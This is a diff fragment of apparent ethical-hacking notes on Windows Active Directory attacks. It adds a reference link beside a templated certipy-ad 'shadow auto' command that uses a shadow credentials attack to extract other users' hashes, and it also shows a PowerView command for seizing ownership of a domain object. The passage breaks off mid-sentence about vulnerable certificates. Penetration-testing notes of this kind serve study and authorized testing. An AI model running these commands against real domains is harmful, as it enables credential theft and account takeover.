Gianlush/Workspace_Ethical_Hacking/utils/windows-notes.md

 `Set-DomainObjectOwner -TargetIdentity {target_user} -PrincipalIdentity {user}`

 # Certipy-AD
-when you already have a user you can try to extract hashes for other users:
+when you already have a user you can try to extract hashes for other users [learn more](https://www.hackingarticles.in/shadow-credentials-attack/):

 - `certipy-ad shadow auto -u '{user}@{domain}' -p "{password}" -account '{target_user}' -dc-ip '{ip}'`

 and also search for vulnerable certificates if you can access the CA_SVC account: